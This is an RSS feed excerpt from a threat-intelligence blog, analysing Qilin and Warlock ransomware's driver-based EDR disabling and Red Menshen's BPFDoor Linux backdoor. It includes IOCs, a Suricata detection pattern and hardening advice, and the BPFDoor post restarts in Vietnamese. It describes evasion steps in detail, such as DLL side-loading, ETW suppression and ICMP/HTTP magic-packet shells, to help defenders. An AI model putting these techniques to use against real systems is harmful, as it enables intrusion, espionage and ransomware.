<p><a href="https://blog.talosintelligence.com/an-overview-of-ransomware-threats-in-japan-in-2025-and-early-detection-insights-from-qilin-cases/">An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases</a></p>
<p><a href="https://cybersecsentinel.com/byovd-ransomware-attacks-now-capable-of-defeating-every-major-edr-product/">BYOVD Ransomware Attacks Now Capable of Defeating Every Major EDR Product</a></p>
<p><a href="https://cyberpress.org/qilin-ransomware-4/">Qilin Ransomware Uses Malicious DLL to Disable Nearly All EDR Solutions</a></p>
]]></content:encoded></item><item><title><![CDATA[How was the defense system disabled? Inside the campaign of Qilin & Warlock]]></title><description><![CDATA[Summary of the campaign
Two notorious Ransomware-as-a-Service (RaaS) groups, Qilin and Warlock (also known as Water Manual), are independently deploying the "Bring Your Own Vulnerable Driver" (BYOVD) ]]></description><link>https://blog.fiscybersec.com/how-was-the-defense-system-disabled-inside-the-campaign-of-qilin-warlock</link><guid isPermaLink="true">https://blog.fiscybersec.com/how-was-the-defense-system-disabled-inside-the-campaign-of-qilin-warlock</guid><category><![CDATA[qilin]]></category><category><![CDATA[warlock]]></category><category><![CDATA[Ransomware-as-a-Service (RaaS)]]></category><category><![CDATA[BYOVD]]></category><category><![CDATA[EDR]]></category><category><![CDATA[DLL loading]]></category><category><![CDATA[threat intelligence]]></category><dc:creator><![CDATA[Lưu Tuấn Anh]]></dc:creator><pubDate>Thu, 09 Apr 2026 03:06:59 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/fba7404d-d798-4c59-8c38-997ed058b49b.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Summary of the campaign</h2>
<p>Two notorious Ransomware-as-a-Service (RaaS) groups, Qilin and Warlock (also known as Water Manual), are independently deploying the "Bring Your Own Vulnerable Driver" (BYOVD) technique at the Kernel level. Their goal is to proactively "kill" Endpoint Detection and Response (EDR) processes before releasing the encryption payload. Research confirms these toolkits can disable over 300 EDR drivers from nearly all major security vendors in the market today. The alarming level of the Qilin campaign is demonstrated by real data: In 2025, ransomware incidents in Japan increased by 17.5%, with Qilin accounting for the largest share at 16.4% of total infections, heavily targeting the manufacturing and automotive sectors. The weaponization of BYOVD, once the privilege of Nation-State APT groups, has now been commercialized for financial interest groups.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/5fd0a949-0f25-414f-8bfe-87df774e3d83.png" alt="" style="display:block;margin:0 auto" />

<p>The most urgent action for every organization: Immediately enable Hypervisor-protected Code Integrity (HVCI - Memory Integrity) and promptly update the Microsoft Vulnerable Driver Blocklist across all Windows partitions.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/c5a087b8-b383-407d-a706-377170fddfb7.png" alt="" style="display:block;margin:0 auto" />

<h2>Hacker Group Profile</h2>
<p>Behind this large-scale BYOVD campaign are two independent underground organizations with formidable capabilities: Qilin Group: A RaaS (Ransomware-as-a-Service) gang suspected to be based in the Post-Soviet region. The clearest evidence is their EDR Killer module, which integrates "Geo-fencing" to prevent malware activation on systems using languages from this region, helping them evade local sanctions. Currently, Qilin has become the most notorious malware operator, with a significant increase in ransomware victims, notably causing the largest share of attacks in Japan in the first half of 2025. Warlock Group (or Water Manual): A RaaS gang that exploits a ransomware branch derived from LockBit (distributing encryption payloads with the .x2anylock extension). Warlock's distinctive behavior involves exploiting delays in Microsoft SharePoint server patching by administrators and patiently "lying in wait" for up to 15 days to fully capture Domain Controller configurations before launching widespread encryption attacks via GPO.</p>
<h2>Preliminary Timeline</h2>
<p>Pre-launch: Qilin extracts stolen credentials on the Darknet or Breach Forums. Warlock exploits unpatched public Microsoft SharePoint servers.  </p>
<p>Dwell Time: From the start of infiltration to encryption deployment, Qilin takes an average of about 6 days. Meanwhile, the Warlock group is willing to lie in wait for up to 15 days to extract data and set up GPO scenarios before attacking.  </p>
<p>Execution: Launch BYOVD driver to disable EDR, encrypt, and establish a double extortion model.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/faaa4697-56bf-4409-bdd8-43890f4e21bb.png" alt="" style="display:block;margin:0 auto" />

<h2>Kill Chain &amp; Attack Flow</h2>
<h3>Stage 1: Initial Access</h3>
<p>Qilin: Gains access through vulnerabilities in internet-facing services, phishing, or credentials submitted on the dark web. Warlock: Exploits unpatched vulnerabilities in Microsoft SharePoint services.</p>
<h3>Stage 2: Execution &amp; Persistence</h3>
<p>Qilin: Uses the legitimate FoxitPDFReader.exe to side-load a malicious DLL, msimg32.dll. Warlock: Deploys a web shell to open a C2 channel and uses the TightVNC tool disguised as a default Windows Service to maintain network persistence.</p>
<h3>Stage 3: Defense Evasion &amp; Credential Access</h3>
<p>Qilin: Disrupts Event Tracing for Windows (ETW) monitoring, applies Halo's Gate mechanism to bypass API syscall hooks, then drops the kernel driver hlpdrv.sys to disable EDR. Warlock: Injects NSecKrnl.sys to run covertly under the kernel to freeze EDR, then deploys Rclone disguised as fake security files (TrendSecurity.exe) to exfiltrate data through a backdoor.</p>
<h3>Stage 4: Impact (Ransomware Execution)</h3>
<p>Qilin encrypts files using open standards. In contrast, Warlock configures widespread encryption through Active Directory GPO, deploying payloads to SYSVOL/NETLOGON folders and forcing victim machines to execute them upon reboot. Locked files have the extension .x2anylock.</p>
<h2>Detailed technical analysis</h2>
<p>The core change in these new campaigns is the Kernel-level EDR Killer sequence.  </p>
<p>Qilin's In-Memory bypass mechanism: Unlike crude process-stopping methods (easily detected), Qilin uses a highly complex DLL loading chain (msimg32.dll). The most dangerous aspect is that this entire sequence is executed in RAM (In-Memory) to evade all hard drive scanners, proceeding in four stages:  </p>
<p>Stage 1 — DLL Search Order Hijacking: The attacker drops a fake msimg32.dll file in the same directory as the legitimate PDF reader software (e.g., FoxitPDFReader.exe). When an administrator or the system runs the PDF software, Windows is tricked into loading the fake DLL instead of the original system file. To avoid suspicion from software crashes, the malicious DLL silently forwards all legitimate responses back to the genuine msimg32.dll file located in C:\Windows\System32\.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/43f4d35e-3d98-4c97-bf5d-f0c6d949a0eb.png" alt="" style="display:block;margin:0 auto" />

<p>Stage 2 — Decryption and Evasion in RAM (Multi-Stage In-Memory Loader): Next, the malware self-extracts through three consecutive processes in temporary memory (without touching the disk). To counter advanced defense mechanisms, it deploys a perfect shield: Disabling Windows' default logging system (ETW suppression) to block signals, using the "Halo's Gate" method to bypass operating system syscall hooks, and intricately disguising the execution flow (through SEH/VEH obfuscation) to frustrate any reverse engineer sweating over RAM garbage analysis. Stage 3 — Deploying EDR Killer (BYOVD Deployment): Only when the anonymous shields are fully deployed does the payload in RAM quietly drop exactly two driver files into the %TEMP% directory. The first file is rwdrv.sys — a wrapper for the ThrottleStop.sys driver (trusted third-party signed but with severe privilege management flaws), allowing the application to read/write directly to the CPU's original configuration structure. The second file is hlpdrv.sys, which "borrows" elevated privileges from the first file to directly execute termination commands on self-defense processes in security applications.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/81f5c291-3ec6-41ba-a1d7-7848aca43dc6.png" alt="" style="display:block;margin:0 auto" />

<p>Stage 4 — Silent EDR "Massacre": Qilin doesn't kill EDR overtly. Before pulling the plug, the malicious driver quietly removes all "security cameras" (EDR monitoring callbacks) embedded in the OS core by security software. The EDR process becomes blind from within and shuts down, unable to send any shutdown alerts to the central server (SOC). Once the protective shield completely vanishes, the ransomware begins its file encryption massacre.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/7a9fd121-89c9-414c-97ec-aa14d8c95a2d.png" alt="" style="display:block;margin:0 auto" />

<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/7fcdac82-5aa0-4c76-8a02-bbf34feaebf2.png" alt="" style="display:block;margin:0 auto" />

<p>Warlock's BYOVD Mechanism: On another front, instead of using the old driver googleApiUtil64.sys like earlier this year, Warlock has now switched to the upgraded NSecKrnl.sys. The strategy to deceive EDR involves stealth tactics by directly renaming the malicious file to "TrendFileSecurityCheck.exe." This art of blending into a fabricated environment (disguising as a legitimate scanning process of Trend Micro software) makes it easier for signal analysis software to overlook the tampered data flow.</p>
<h2>IOCs</h2>
<p><strong>Malicious files (SHA-256 Hash)</strong></p>
<p>7787da25451f5538766240f4a8a2846d0a589c59391e15f188aa077e8b888497</p>
<p>16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0</p>
<p>bd1f381e5a3db22e88776b7873d4d2835e9a1ec620571d2b1da0c58f81c84a56</p>
<p><strong>Network Indicators (C2)</strong></p>
<p>198[.]13[.]158[.]193</p>
<h2><strong>MITRE ATT&amp;CK Mapping</strong></h2>
<p>TA0001 - Initial Access: T1190 (Exploit Public-Facing Application) - Targeting SharePoint. TA0002 - Execution: T1569.002 (Service Execution) - Launch Windows Services. TA0003 - Persistence: T1543.003 (Windows Service) - TightVNC installed via PsExec. TA0005 - Defense Evasion: T1574.002 (DLL Side-Loading), T1068 (Exploitation for Privilege Escalation - BYOVD), T1562.001 (Disable or Modify Tools - Disable EDR driver). TA0011 - Command and Control: T1090.003 (Multi-hop Proxy) - Using SOCKS5 Yuze, VS Code tunnel, Cloudflare Tunnel.</p>
<h2>Expert opinion</h2>
<p>These attacks shatter the false belief that having an expensive EDR product is enough to protect an endpoint. By exploiting a harmless driver file (like ThrottleStop) with a design flaw in memory permissions (paving the way for BYOVD), current RaaS malware can instantly lock down an entire EDR pipeline without the SOC center receiving any incident logs. A dwell time of 6 to 15 days in this campaign highlights a significant vulnerability in "Pre-Ransomware Detection." If the SOC team cannot detect unusual behaviors, such as continuous net user /add commands running in the early morning, the RaaS group will treat these privileges as a free testing ground for DLL injection chains. Furthermore, RaaS has officially elevated the technical capability of a ransomware attack to the level of nation-state attacks.</p>
<h2>Recommendation</h2>
<p>Immediate (0-24 hours)</p>
<ul>
<li><p>Immediately enable Hypervisor-Protected Code Integrity (HVCI - Memory Integrity) on all Windows endpoints (located in Windows Security &gt; Device Security &gt; Core Isolation). HVCI is the most crucial barrier to stop the embedding of rwdrv.sys or NSecKrnl.sys files.</p>
</li>
<li><p>Deploy Windows Defender Application Control (WDAC) and import the Microsoft Vulnerable Driver Blocklist.</p>
</li>
</ul>
<p>Short-term (1-7 days)</p>
<ul>
<li><p>Create internal alert rules (EDR/SIEM/Sysmon): Flag any process calling the msimg32.dll file that is outside the C:\Windows\System32 directory. Side-loading often occurs through FoxitPDFReader.exe or 7-Zip.</p>
</li>
<li><p>Activate alert rules when a new system service is installed (Event ID 7045) or there is a driver load error (Event ID 219) related to the %TEMP%, SYSVOL areas. Specifically, configure Sysmon to scan for Event ID 6 (DriverLoad).</p>
</li>
</ul>
<p><strong>Long-term</strong></p>
<ul>
<li><p>Strictly manage Group Policy infrastructure. Warlock's AD ransomware scenario relies entirely on writing payloads to the SYSVOL directory to force the Domain Controller to overwrite ransomware onto client branches. Transition to a Tiered administration model to reduce the blast radius in a compromised environment.</p>
</li>
<li><p>Ensure prompt patching of web applications, particularly on Microsoft SharePoint.</p>
</li>
</ul>
<h2>Refer to</h2>
<p><a href="https://thehackernews.com/2026/04/qilin-and-warlock-ransomware-use.html">Qilin and Warlock Ransomware Use Vulnerable Drivers to Disable 300+ EDR Tools</a></p>
<p><a href="https://blog.talosintelligence.com/an-overview-of-ransomware-threats-in-japan-in-2025-and-early-detection-insights-from-qilin-cases/">An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases</a></p>
<p><a href="https://cybersecsentinel.com/byovd-ransomware-attacks-now-capable-of-defeating-every-major-edr-product/">BYOVD Ransomware Attacks Now Capable of Defeating Every Major EDR Product</a></p>
<p><a href="https://cyberpress.org/qilin-ransomware-4/">Qilin Ransomware Uses Malicious DLL to Disable Nearly All EDR Solutions</a></p>
]]></content:encoded></item><item><title><![CDATA[Invisible malware in the Linux kernel: Are you sure your system is clean?]]></title><description><![CDATA[Overview
In the modern world of cybersecurity, most defense mechanisms are built on a familiar assumption: every threat will leave a trace — a suspicious connection, an open port, or at least an unusu]]></description><link>https://blog.fiscybersec.com/invisible-malware-in-the-linux-kernel-are-you-sure-your-system-is-clean</link><guid isPermaLink="true">https://blog.fiscybersec.com/invisible-malware-in-the-linux-kernel-are-you-sure-your-system-is-clean</guid><category><![CDATA[linux kernel]]></category><category><![CDATA[BPFDoor]]></category><category><![CDATA[APT Red Menshen]]></category><category><![CDATA[httpShell]]></category><category><![CDATA[icmpShell]]></category><category><![CDATA[threat intelligence]]></category><dc:creator><![CDATA[Lưu Tuấn Anh]]></dc:creator><pubDate>Thu, 09 Apr 2026 03:06:20 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/2bd29728-38a2-4c70-83e0-64ea8d3afafb.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Overview</h2>
<p>In the modern world of cybersecurity, most defense mechanisms are built on a familiar assumption: every threat will leave a trace — a suspicious connection, an open port, or at least an unusual behavior in the system. The APT Red Menshen group is covertly deploying seven entirely new BPFDoor variants to manipulate the core infrastructure of telecommunications providers. Based on an analysis of nearly 300 of the latest malware samples from Rapid7, this campaign has bypassed traditional EDR defenses by using Berkeley Packet Filters (BPFs) at the Kernel level, creating an invisible "trapdoor" architecture that activates only with a magic packet through stateless protocols.</p>
<h2>Red Menshen - the APT group behind BPFDoor</h2>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/60f6b8ea-f332-4cfc-a5da-734c53e2ad5e.png" alt="" style="display:block;margin:0 auto" />

<h3>Introduction</h3>
<p>Red Menshen is a sophisticated cyber attack group (APT – Advanced Persistent Threat) known for using the BPFDoor backdoor in espionage campaigns spanning several years, specifically targeting telecommunications infrastructure and critical systems. Unlike many other noisy APT groups, Red Menshen operates with the philosophy: "Stay invisible, stay persistent." Simply put, this means causing no destruction, creating no noise, and quietly maintaining access over a long period.</p>
<h3>Scope of operations</h3>
<p>Red Menshen is noted for operating globally, with primary targets including telecom providers, internet infrastructure, enterprise Linux servers, and core network systems. The reason the hackers target telecom is simply to access call metadata, monitor user traffic, and serve strategic espionage goals.</p>
<h3>Prominent attack techniques</h3>
<p>Implant into router firmware Use custom backdoor Living-off-the-land Supply chain attack (possible)</p>
<h2>Detailed techniques</h2>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/b385e9f7-8ba9-4747-90c3-c2e9a215d692.png" alt="" style="display:block;margin:0 auto" />

<h3>How has BPFDoor "evolved"?</h3>
<p>Initially, BPFDoor was a fairly simple rootkit temporarily running in the /dev/shm directory, leaving no files on the disk and erasing traces after operation. This made it hard to detect, but its main weakness was that modern security systems could identify "strange" processes running from memory. After some upgrades, new variants changed their strategy: storing the malware directly on disk, masquerading as system processes (e.g., server management daemons) to make it appear legitimate and less suspicious. Simply put: shifting from "temporary concealment" to "long-term concealment and self-legitimization."</p>
<h3>Command and Control (C2) architecture</h3>
<p>The Red Menshen group uses two main methods to control BPFDoor: httpShell, which hides in web traffic, and icmpShell, which hides in ping (ICMP).</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/98c159bd-0387-4eed-b4fa-fe5ce48d516e.png" alt="" style="display:block;margin:0 auto" />

<h3>httpShell – Hidden in HTTP traffic</h3>
<p>BPFDoor will monitor all network traffic, not at the application level but deep in the kernel. This means it sees packets before the firewall or antivirus.</p>
<p>In reality, the Internet has multiple layers (tunnels) such as GRE or GTP (in telecommunications networks). httpShell can "unwrap" these layers directly in the kernel to see the data inside. It's like opening an envelope, then opening another envelope inside, until the real content is revealed.</p>
<p>httpShell has another ability to evade firewalls and WAFs. Normally, firewalls/WAFs check the data position in a packet. BPFDoor uses a clever trick by adding padding (fake data) and forcing the identifier "9999" to always be at the 26th byte. As a result, even if the packet is altered by a proxy, the malware still finds the correct "signal" to exploit.</p>
<h3>icmpShell – Control via ping</h3>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/af97678e-060e-4210-917a-d98b76eb76b5.png" alt="" style="display:block;margin:0 auto" />

<p>This variant, instead of using HTTP, will use ICMP (ping) to communicate and create a two-way control shell, which is often extremely dangerous because ICMP is usually not blocked.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/258dd019-0989-4ac8-beba-b9857d22a982.png" alt="" style="display:block;margin:0 auto" />

<p>This dangerous variant also uses the "PID mutation" technique. This means each time the malware runs, it has a different PID (Process ID). BPFDoor exploits this by attaching logic to the PID, causing its "signature" to change with each run. As a result, the firewall cannot write a fixed rule to block it.</p>
<p>Another point is the extremely clever way this variant operates. Typically, malware requires a fixed C2 server (IP/domain), but BPFDoor does not. When an attacker sends a packet, the malware doesn't need to know the IP in advance; instead, it just reads the source IP of the packet and then makes a reverse connection. Simply put, the attacker can control it from anywhere without needing a fixed infrastructure.</p>
<p>In cases where the malware cannot connect, it turns the infected machine into a relay, sending ICMP to another machine on the internal network. This is even more dangerous as it allows the variant to penetrate deeper into the system like a secret router.</p>
<h2>What makes BPFDoor dangerous?</h2>
<p>Operates in the kernel, almost "invisible" to antivirus. No need for a fixed C2, making it impossible to block by IP/domain. Uses a legitimate protocol, but inside is a secret control channel.</p>
<ul>
<li><p>HTTP → normal</p>
</li>
<li><p>ICMP → normal</p>
</li>
<li><p>NTP → normal</p>
</li>
</ul>
<p>Constant changes with a non-fixed signature make it very difficult to detect using rules.</p>
<h2>Expert assessment &amp; conclusion</h2>
<p>The logical shift of the BPF filter from initializing SOCK_RAW sockets to SOCK_DGRAM provides a clear view of Red Menshen's objectives. The group is actively streamlining the process of dissecting virtual packets, leaving the task of unraveling complex telecommunications layers (like IPsec and GRE node setups) to the target server's kernel. Typically, telecommunications control servers maintain a heavy multi-layered network array; this adjustment allows BPFDoor to eliminate bulky decoding libraries, reducing the infection footprint and the risk of crashing the core processes of the national network system.</p>
<p>Additionally, the malware's precise identification of the disguise process in the format of HPE Insight Management (cmathreshd) with the specific command -p 5 -s OK for deployment into the Bare-Metal hardware of HPE ProLiant demonstrates that this APT campaign has a deep understanding of the infrastructure architecture that the victim—especially the 4G/5G core clusters of Ericsson—is operating.</p>
<p>The variant's direct trace of hidden system files into the directory /var/run/user/0 instead of using the chmod script allows the attacker to avoid modifying execution permissions recorded in the auditd log file. This is a highly sophisticated technique that undermines the logic of detecting malicious files in current host-monitoring EDR platforms in Vietnam.</p>
<h2>Recommendation</h2>
<p><strong>Immediate (0-24h)</strong></p>
<ul>
<li><p>Conduct a network infrastructure scan for ICMP packet connections with Sequence Number = 1234 and an invalid ICMP Code 1. These are beaconing heartbeats revealing the variant's blind spot.</p>
</li>
<li><p>Check the process list on Linux servers, focusing on direct execution of root mask processes like zabbix_agentd, dockerd, or cmathreshd without practical mapping to /bin or software installation directories. Administrators are encouraged to immediately run the script rapid7_bpfdoor_check.sh to capture filter logic pinned to AF_PACKET packets.</p>
</li>
</ul>
<p><strong>Short-term (1-7 days)</strong></p>
<ul>
<li><p>Immediately block and review connections to the following DNS endpoints: ntpussl.instanthq.com, ntpupdate.ddnsgeek.com, ntpd.casacam.net, ntpupdate.ygto.com.</p>
</li>
<li><p>Change the rule detection model to depend on payload, applying structural identification indicators. Update the Suricata rule to match byte-level from BPF backdoor like: udp[8:2] == 0x3182 or (icmp[8:2] == 0x1051 and icmp[icmptype] == icmp-echo)</p>
</li>
</ul>
<p><strong>Long-term</strong></p>
<ul>
<li><p>Add monitoring rules to the auditd system module to closely track all socket creation operations under the AF_PACKET label, specifically targeting the setsockopt command used to attach BPF filter strings to the kernel.</p>
</li>
<li><p>Restructure the privilege mechanism for running services as root on physical telecom core clusters. Deeply implement the File Integrity Monitoring (FIM) system to immediately patch the spread paths in temporary /run directories.</p>
</li>
</ul>
<h2>MITRE ATT&amp;CK Mapping</h2>
<table>
<thead>
<tr>
<th><strong>Tactic</strong></th>
<th><strong>Technique ID</strong></th>
<th><strong>Technique Name</strong></th>
<th>How BPFDoor uses</th>
</tr>
</thead>
<tbody><tr>
<td>Execution</td>
<td>T1059</td>
<td>Command and Scripting Interpreter</td>
<td>Provide remote shell via HTTP / ICMP</td>
</tr>
<tr>
<td>Persistence</td>
<td>T1036</td>
<td>Masquerading</td>
<td>Masquerading legitimate system processes</td>
</tr>
<tr>
<td>Persistence</td>
<td>T1543</td>
<td>Create or Modify System Process</td>
<td>Services can be created to maintain persistence</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>T1014</td>
<td>Rootkit</td>
<td>Use BPF in the kernel to hide activity</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>T1620</td>
<td>Reflective Code Loading</td>
<td>Run fileless from <code>/dev/shm</code></td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>T1027</td>
<td>Obfuscated/Compressed Files and Information</td>
<td>Magic packet is encoded, marker fixed</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>T1070</td>
<td>Indicator Removal on Host</td>
<td>Delete file/process traces</td>
</tr>
<tr>
<td>Command &amp; Control</td>
<td>T1071</td>
<td>Application Layer Protocol</td>
<td>Communicate via HTTP (httpShell)</td>
</tr>
<tr>
<td>Command &amp; Control</td>
<td>T1095</td>
<td>Non-Application Layer Protocol</td>
<td>Tunnel via ICMP (icmpShell)</td>
</tr>
<tr>
<td>Command &amp; Control</td>
<td>T1094</td>
<td>Custom C2 Protocol</td>
<td>Magic packet + Hidden IP (HIP)</td>
</tr>
<tr>
<td>Command &amp; Control</td>
<td>T1090</td>
<td>Proxy</td>
<td>Relay traffic through infected host</td>
</tr>
<tr>
<td>Command &amp; Control</td>
<td>T1001</td>
<td>Data Obfuscation</td>
<td>Padding + hides data in the packet</td>
</tr>
<tr>
<td>Discovery</td>
<td>T1046</td>
<td>Network Service Discovery</td>
<td>Passively sniff traffic via BPF</td>
</tr>
<tr>
<td>Lateral Movement</td>
<td>T1021</td>
<td>Remote Services</td>
<td>Pivot sang host khác qua tunnel</td>
</tr>
<tr>
<td>Collection</td>
<td>T1040</td>
<td>Network Sniffing</td>
<td>Capture packets directly at the kernel level</td>
</tr>
</tbody></table>
<h2><strong>IOCs</strong></h2>
<p><strong>BPFDoor Controller</strong></p>
<p>6227cb77cb4ab1d066eebf14e825dbc0a0a7f1e9 64171d46c8290c5cd88e0fbce9e23dcecbe20865 65e4d507b1de3a1e4820e4c81808fdfd7e238e10 9bb8977cd5fc7be484286be8124154ab8a608d96</p>
<p><strong>BPFDoor Malware</strong></p>
<p>02aebc3762e766be0ac24ef57a135398344a8f7e 04aa241c574f0a7ec93ba5d27807d8e78467f21e 16f94f0df6003f1566b2108f55e247f60a316185 1db21dbf41de5de3686195b839e74dc56d542974 28765121730d419e8656fb8d618b2068408fe5ae 291af8adf6fa078692d0bf5e0d9d00c376bb3fff 316ac8215095a24429632849407311b18a16e0cf 351febd645c66a3c9a79253d0aefcce8ff77054c 3771319be1c8883610c65977811e93b0bdaddf6f 4181bc848a1cd32911a83e02feac9b8abbd69ae2 43b4dbc71ada99a7b8a8d6d0490ba5526a34f9a0 4b1ea5e7b28eb110d8741b76d34f7dbae6f13b79 4c89beab00e3119cf516d6f98d364a5d99232181 5ddcbe4b591293f7b34fc0ef65db6248bcc67eb6 64171d46c8290c5cd88e0fbce9e23dcecbe20865 7ab39d7aad49abb0f626383ed776fe20a3b4c8f3 88075bbc34655d1fa2a750f3bbdee38214974009 8b5844fcbf6af23bc0b410fc180e7e6bdd4f35c7 8ebe1a71af1061d9e943bdff46c5ed954d8c9348 937f6068df4e091cf92d50afb3c6b7cad1de6230 9bdea37835cdb7f0b291891386af28184ac85f79 a6b66b8b7eae2969fd7237888d30766baa1b2274 be47b0c2fb328a338874f6efbe8305ddb74f6a48 c38fc109e31c9d67a1efc6cb767f826b7e46fb19 c54e214810ca7042d013845076b0360bdd7132b2 c83651d7706efa8c115f2a0edb07f863f4e79ce5 d53b7d0030a095a3ffa4b67d13de82d08adda248 d61bf187c4cd3f9953b567b3ad320b9ecde1c347 d9037e0de902e6f7b6c5f1b3269ba482f5e67c8a dc94eaa39e11f2ca7739d2cfded9eec1967f33ee dd8db29e90c6b52ee3d2723cc168cf33ee0bb521 e17ddb6515f2d399552245191f98458b68fece7b ef03b84048193a158ecf1f7033ab0cc8869dd2a5 f61589b1f86d8692964a6bd3e96ddadbe22994eb fb488cdfd2e475f0d5cbecfe11e9bab2241f9d50</p>
<h2>Reference</h2>
<p><a href="https://www.rapid7.com/blog/post/tr-new-whitepaper-stealthy-bpfdoor-variants/">New Whitepaper: Stealthy BPFDoor Variants are a Needle That Looks Like Hay</a></p>
<p><a href="https://thehackernews.com/2026/03/china-linked-red-menshen-uses-stealthy.html">China-Linked Red Menshen Uses Stealthy BPFDoor Implants to Spy via Telecom Networks</a></p>
<p><a href="https://www.securityweek.com/chinese-hackers-caught-deep-within-telecom-backbone-infrastructure/">Chinese Hackers Caught Deep Within Telecom Backbone Infrastructure - SecurityWeek</a></p>
<p><a href="https://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html">BPFDoors Hidden Controller Used Against Asia, Middle East Targets | Trend Micro (US)</a></p>
]]></content:encoded></item><item><title><![CDATA[Malware ‘tàng hình’ trong kernel Linux: Bạn có chắc hệ thống mình sạch?]]></title><description><![CDATA[Tổng quan
Trong thế giới an ninh mạng hiện đại, phần lớn các cơ chế phòng thủ đều được xây dựng dựa trên một giả định quen thuộc: mọi mối đe dọa đều sẽ để lại dấu vết — một kết nối đáng ngờ, một port ]]></description><link>https://blog.fiscybersec.com/malware-t-ng-h-nh-trong-kernel-linux-b-n-c-ch-c-h-th-ng-m-nh-s-ch</link><guid isPermaLink="true">https://blog.fiscybersec.com/malware-t-ng-h-nh-trong-kernel-linux-b-n-c-ch-c-h-th-ng-m-nh-s-ch</guid><category><![CDATA[linux kernel]]></category><category><![CDATA[BPFDoor]]></category><category><![CDATA[APT Red Menshen]]></category><category><![CDATA[httpShell]]></category><category><![CDATA[icmpShell]]></category><category><![CDATA[threat intelligence]]></category><dc:creator><![CDATA[Lưu Tuấn Anh]]></dc:creator><pubDate>Wed, 08 Apr 2026 02:54:31 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/455aba9a-8453-4478-8d85-b1da6db8dcce.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2><strong>Tổng quan</strong></h2>
<p>Trong thế giới an ninh mạng hiện đại, phần lớn các cơ chế phòng thủ đều được xây dựng dựa trên một giả định quen thuộc: <strong>mọi mối đe dọa đều sẽ để lại dấu vết</strong> — một kết nối đáng ngờ, một port mở, hay ít nhất là một hành vi bất thường trong hệ thống.</p>
<p>Nhóm <strong>APT Red Menshen</strong> đang ngấm ngầm triển khai 7 biến thể <strong>BPFDoor</strong> hoàn toàn mới để thao túng hạ tầng lõi của các nhà mạng viễn thông. Dựa trên phân tích gần 300 mẫu mã độc mới nhất từ <strong>Rapid7</strong>, chiến dịch này đã vượt qua các lớp phòng thủ EDR truyền thống bằng cách sử dụng công nghệ Berkeley Packet Filters (BPFs) ở cấp độ Kernel, tạo ra một kiến trúc "trapdoor" tàng hình chỉ kích hoạt bằng magic packet thông qua các giao thức phi trạng thái.</p>
<h2><strong>Red Menshen – Nhóm APT đứng sau BPFDoor</strong></h2>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/60f6b8ea-f332-4cfc-a5da-734c53e2ad5e.png" alt="" style="display:block;margin:0 auto" />

<h3>Giới thiệu</h3>
<p><strong>Red Menshen</strong> là một nhóm tấn công mạng tinh vi (APT – Advanced Persistent Threat) được biết đến với việc sử dụng backdoor <strong>BPFDoor</strong> trong các chiến dịch gián điệp kéo dài nhiều năm, đặc biệt nhắm vào <strong>hạ tầng viễn thông</strong> và các hệ thống trọng yếu.</p>
<p>Không giống nhiều nhóm APT ồn ào khác, Red Menshen hoạt động với triết lý: <strong>“Stay invisible, stay persistent.”</strong> Hiểu một cách đơn giản tức là không gây phá hoại, không tạo noise và chỉ âm thầm duy trì quyền truy cập trong thời gian dài</p>
<h3>Phạm vi hoạt động</h3>
<p><strong>Red Menshen</strong> được ghi nhận hoạt động trên phạm vi toàn cầu, với các mục tiêu chính: Telecom providers (nhà mạng), Internet infrastructure, Enterprise Linux servers, Core network systems.</p>
<p>Lý do mà nhóm tin tặc nhắm vào telecom chỉ đơn giản là truy cập metadata cuộc gọi, theo dõi lưu lượng người dùng và phục vụ mục tiêu <strong>gián điệp chiến lược.</strong></p>
<h3>Kỹ thuật tấn công nổi bật</h3>
<p>Implant vào firmware router</p>
<p>Sử dụng backdoor tùy biến</p>
<p>Living-off-the-land</p>
<p>Tấn công chuỗi cung ứng (có khả năng)</p>
<h2><strong>Kỹ thuật chi tiết</strong></h2>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/b385e9f7-8ba9-4747-90c3-c2e9a215d692.png" alt="" style="display:block;margin:0 auto" />

<h3>BPFDoor đã “tiến hóa” như thế nào?</h3>
<p>Ban đầu, <strong>BPFDoor</strong> chỉ là một dạng rootkit khá đơn giản được chạy tạm trong thư mục <code>/dev/shm</code>, không lưu file trên ổ đĩa và tự xóa dấu vết sau khi hoạt động. Điều này giúp nó <strong>khó bị phát hiện</strong>, nhưng cũng có điểm yếu chính là các hệ thống bảo mật hiện đại có thể phát hiện process “lạ” chạy từ memory.</p>
